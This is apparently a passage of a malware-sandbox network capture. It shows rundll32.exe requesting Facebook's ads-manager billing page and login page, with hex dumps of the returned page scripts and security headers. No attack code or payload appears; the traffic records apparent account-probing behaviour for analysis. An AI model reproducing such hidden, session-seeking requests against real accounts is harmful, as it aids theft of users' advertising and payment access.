31 30 63 30 37 39 5f 30 5f 30 5f 35 7a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 42 61 68 61 73 61 20 49 6e 64 6f 6e
                                                                                                                                                                                    Data Ascii: y-manage-dialog-accept-button\" title=\"Allow essential and optional cookies\" type=\"submit\" id=\"u_0_e_hV\">Allow essential and optional cookies\u003C\/button>\u003C\/div>\u003C\/div>\u003C\/div>"},9],["__markup_3310c079_0_0_5z",{"__html":"Bahasa Indon
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20127INData Raw: 62 37 5c 75 30 33 62 64 5c 75 30 33 62 39 5c 75 30 33 62 61 5c 75 30 33 61 63 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6d 5f 30 46 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 34 32 30 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 61 5c 75 30 34 33 38 5c 75 30 34 33 39 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6e 5f 65 63 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 35 65 32 5c 75 30 35 64 31 5c 75 30 35 65 38 5c 75 30 35 64 39 5c 75 30 35 65 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 6c 72 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36
                                                                                                                                                                                    Data Ascii: b7\u03bd\u03b9\u03ba\u03ac"},1],["__markup_3310c079_0_m_0F",{"__html":"\u0420\u0443\u0441\u0441\u043a\u0438\u0439"},1],["__markup_3310c079_0_n_ec",{"__html":"\u05e2\u05d1\u05e8\u05d9\u05ea"},1],["__markup_3310c079_0_o_lr",{"__html":"\u0627\u0644\u0639\u06
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20129INData Raw: 5c 2f 22 2c 22 75 5f 30 5f 62 5f 6c 54 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6c 44 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 38 5f 35 36 22 2c 22 75 5f 30 5f 63 5f 58 38 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6c 44 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 31 5f 63 6e 22 2c 22 75 5f 30 5f 64 5f 48 43 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6c 44 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 74 4d 22 2c 22 75 5f 30 5f 65 5f 68 56 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6c 44 22 5d 5d 2c 22 72 65 71 75 69 72 65
                                                                                                                                                                                    Data Ascii: \/","u_0_b_lT",1,"__markup_9f5fac15_0_0_lD"],["__elem_a588f507_0_8_56","u_0_c_X8",1,"__markup_9f5fac15_0_0_lD"],["__elem_45d73b5d_0_1_cn","u_0_d_HC",1,"__markup_9f5fac15_0_0_lD"],["__elem_45d73b5d_0_0_tM","u_0_e_hV",1,"__markup_9f5fac15_0_0_lD"]],"require
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20130INData Raw: 6e 65 41 75 74 6f 73 65 74 22 2c 22 73 65 74 49 6e 70 75 74 56 61 6c 75 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 43 32 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 30 5f 43 32 22 7d 2c 31 36 37 32 39 30 35 36 38 35 5d 5d 2c 5b 22 53 63 72 65 65 6e 44 69 6d 65 6e 73 69 6f 6e 73 41 75 74 6f 53 65 74 22 2c 22 73 65 74 49 6e 70 75 74 56 61 6c 75 65 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 6a 4b 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 6a 4b 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f
                                                                                                                                                                                    Data Ascii: neAutoset","setInputValue",["__elem_f46f4946_0_0_C2"],[{"__m":"__elem_f46f4946_0_0_C2"},1672905685]],["ScreenDimensionsAutoSet","setInputValue",["__elem_f46f4946_0_1_jK"],[{"__m":"__elem_f46f4946_0_1_jK"}]],["LoginFormController","init",["__elem_835c633a_
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20132INData Raw: 30 37 5f 30 5f 37 5f 5c 2f 5c 2f 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 38 5f 35 36 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 38 5f 35 36 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65
                                                                                                                                                                                    Data Ascii: 07_0_7_\/\/"},"_9ngb","._9nga","._9ngd","._9ngg"]],["CookieAccordion","init",["__elem_a588f507_0_8_56"],[{"__m":"__elem_a588f507_0_8_56"},"_9ngb","._9nga","._9ngd","._9ngg"]],["Animation"],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEve
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20133INData Raw: 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 44 2f 6c 2f 30 2c 63 72 6f 73 73 2f 70 59 72 6a 4d 37 49 31 5f 42 68 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 32 2f 6c 2f 30 2c 63 72 6f 73 73 2f 57 5f 66 33 7a 51 30 43 63 36 65 2e 63 73 73
                                                                                                                                                                                    Data Ascii: _nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yD/l/0,cross/pYrjM7I1_Bh.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/W_f3zQ0Cc6e.css
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20135INData Raw: 64 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 5f 5f 62 69 67 50 69 70 65 43 74 6f 72 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 42 69 67 50 69 70 65 29 7b 64 65 66 69 6e 65 28 22 5f 5f 62 69 67 50 69 70 65 22 2c 5b 5d 2c 77 69 6e 64 6f 77 2e 62 69 67 50 69 70 65 3d 6e 65 77 20 42 69 67 50 69 70 65 28 7b 22 66 6f 72 63 65 46 69 6e 69 73 68 22 3a 74 72 75 65 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 66 6c 75 73 68 5f 70 61 67 65 6c 65 74 73 5f 61 73 61 70 22 3a 74 72 75 65 2c 22 64 69 73 70 61 74 63 68 5f 70 61 67 65 6c 65 74 5f 72 65 70 6c 61 79 61 62 6c 65 5f 61 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 7d 7d 29 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c
                                                                                                                                                                                    Data Ascii: d" /><script>window.__bigPipeCtor=now_inl();requireLazy(["BigPipe"],function(BigPipe){define("__bigPipe",[],window.bigPipe=new BigPipe({"forceFinish":true,"config":{"flush_pagelets_asap":true,"dispatch_pagelet_replayable_actions":false}}));});</script><
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20136INData Raw: 31 32 37 31 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 70 76 31 45 34 43 4a 64 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 70 76 31 45 34 43 4a 64 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41
                                                                                                                                                                                    Data Ascii: 1271<script nonce="pv1E4CJd">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="pv1E4CJd">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20137INData Raw: 37 4d 67 57 63 51 32 55 70 38 4b 77 33 31 44 49 63 77 50 58 61 4d 79 45 5f 36 55 78 65 6d 45 6c 79 68 62 32 78 71 78 77 5a 42 4a 78 5f 4e 5f 33 6f 44 79 64 69 31 38 6b 70 51 63 64 4f 36 57 4c 37 73 6c 33 46 5a 6f 65 63 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 30 2d 55 59 6b 7a 4c 57 54 48 63 36 75 33 4d 37 4d 67 57 63 51 32 55 70 38 4b 77 33 31 44 49 63 77 50 58 61 4d 79 45 5f 36 55 78 65 6d 45 6c 79 68 62 32 78 71 78 77 5a 42 4a 78 5f 4e 5f 33 6f 44 79 64 69 31 38 6b 70 51 63 64 4f 36 57 4c 37 73 6c 33 46 5a 6f 65 63 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b
                                                                                                                                                                                    Data Ascii: 7MgWcQ2Up8Kw31DIcwPXaMyE_6UxemElyhb2xqxwZBJx_N_3oDydi18kpQcdO6WL7sl3FZoecU"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa0-UYkzLWTHc6u3M7MgWcQ2Up8Kw31DIcwPXaMyE_6UxemElyhb2xqxwZBJx_N_3oDydi18kpQcdO6WL7sl3FZoecU"]},-1],["cr:1083117",[],{
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20139INData Raw: 33 4b 7a 33 4b 4c 77 59 69 70 6b 79 57 73 31 34 77 32 33 31 77 38 57 51 4e 33 32 72 77 79 52 74 67 6a 52 47 51 56 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65
                                                                                                                                                                                    Data Ascii: 3Kz3KLwYipkyWs14w231w8WQN32rwyRtgjRGQVw"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_e
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20140INData Raw: 57 2d 56 52 50 58 51 73 6f 7a 46 33 4b 7a 33 4b 4c 77 59 69 70 6b 79 57 73 31 34 77 32 33 31 77 38 57 51 4e 33 32 72 77 79 52 74 67 6a 52 47 51 56 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 31 79 77 4b 46 62 47 2d 52 62 4a 58 43 42 46 69 4f 56 6d 6a 43 56 4b 63 58 77 73 4f 5a 38 57 2d 56 52 50 58 51 73 6f 7a 46 33 4b 7a 33 4b 4c 77 59 69 70 6b 79 57 73 31 34 77 32 33 31 77 38 57 51 4e 33 32 72 77 79 52 74 67 6a 52 47 51 56 77 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 35 32 37 38 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 0d 0a 66 35 34 0d 0a 44 4f 4d 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 2c 22 41 61
                                                                                                                                                                                    Data Ascii: W-VRPXQsozF3Kz3KLwYipkyWs14w231w8WQN32rwyRtgjRGQVw"]},-1],["cr:983844",[],{__rc:[null,"Aa1ywKFbG-RbJXCBFiOVmjCVKcXwsOZ8W-VRPXQsozF3Kz3KLwYipkyWs14w231w8WQN32rwyRtgjRGQVw"]},-1],["cr:5278",["ReactDOM-prod.classic"],{__rc:["Reactf54DOM-prod.classic","Aa
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20142INData Raw: 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 30 2d 55 59 6b 7a 4c 57 54 48 63 36 75 33 4d 37 4d 67 57 63 51 32 55 70 38 4b 77 33 31 44 49 63 77 50 58 61 4d 79 45 5f 36 55 78 65 6d 45 6c 79 68 62 32 78 71 78 77 5a 42 4a 78 5f 4e 5f 33 6f 44 79 64 69 31 38 6b 70 51 63 64 4f 36 57 4c 37 73 6c 33 46 5a 6f 65 63 55 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 42 44 43 6c 69 65 6e 74 53 69 67 6e 61 6c 43 6f 6c 6c 65 63 74 69 6f 6e 54 72
                                                                                                                                                                                    Data Ascii: cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa0-UYkzLWTHc6u3M7MgWcQ2Up8Kw31DIcwPXaMyE_6UxemElyhb2xqxwZBJx_N_3oDydi18kpQcdO6WL7sl3FZoecU"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClientSignalCollectionTr
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20143INData Raw: 72 58 4f 6c 50 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 31 59 4f 32 59 2d 4e 31 39 72 65 41 30 42 68 36 65 68 46 39 63 79 38 73 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 5d 7d 2c 68 73 72 70 3a 7b 68 73 64 70 3a 7b 63 6c 70 44 61 74 61 3a 7b 22 31 37 34 33 30 39 35 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 37 31 36 39 37 22 3a 7b 72 3a 31 2c 73 3a 31 7d 2c 22 31 38 32 39 33 31 39 22 3a 7b 72 3a 31 7d 2c 22 31 38 32 39 33 32 30 22 3a 7b 72 3a 31 7d 2c 22 31 38 34 33 39 38 38 22 3a 7b 72 3a
                                                                                                                                                                                    Data Ascii: rXOlP",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","1YO2Y-N19reA0Bh6ehF9cy8s",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1743095":{r:1,s:1},"1871697":{r:1,s:1},"1829319":{r:1},"1829320":{r:1},"1843988":{r:
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20144INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    76192.168.2.450838157.240.214.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20144OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20145INHTTP/1.1 302 Found
                                                                                                                                                                                    Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20146INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    77192.168.2.450839157.240.214.35443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20148OUTGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                    Host: www.facebook.com
                                                                                                                                                                                    User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
                                                                                                                                                                                    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    sec-ch-prefers-color-scheme: light
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20149INHTTP/1.1 200 OK
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
                                                                                                                                                                                    x-fb-rlafr: 0
                                                                                                                                                                                    content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                                                                    2023-01-05 08:01:40 UTC20150INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                                                                    Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb
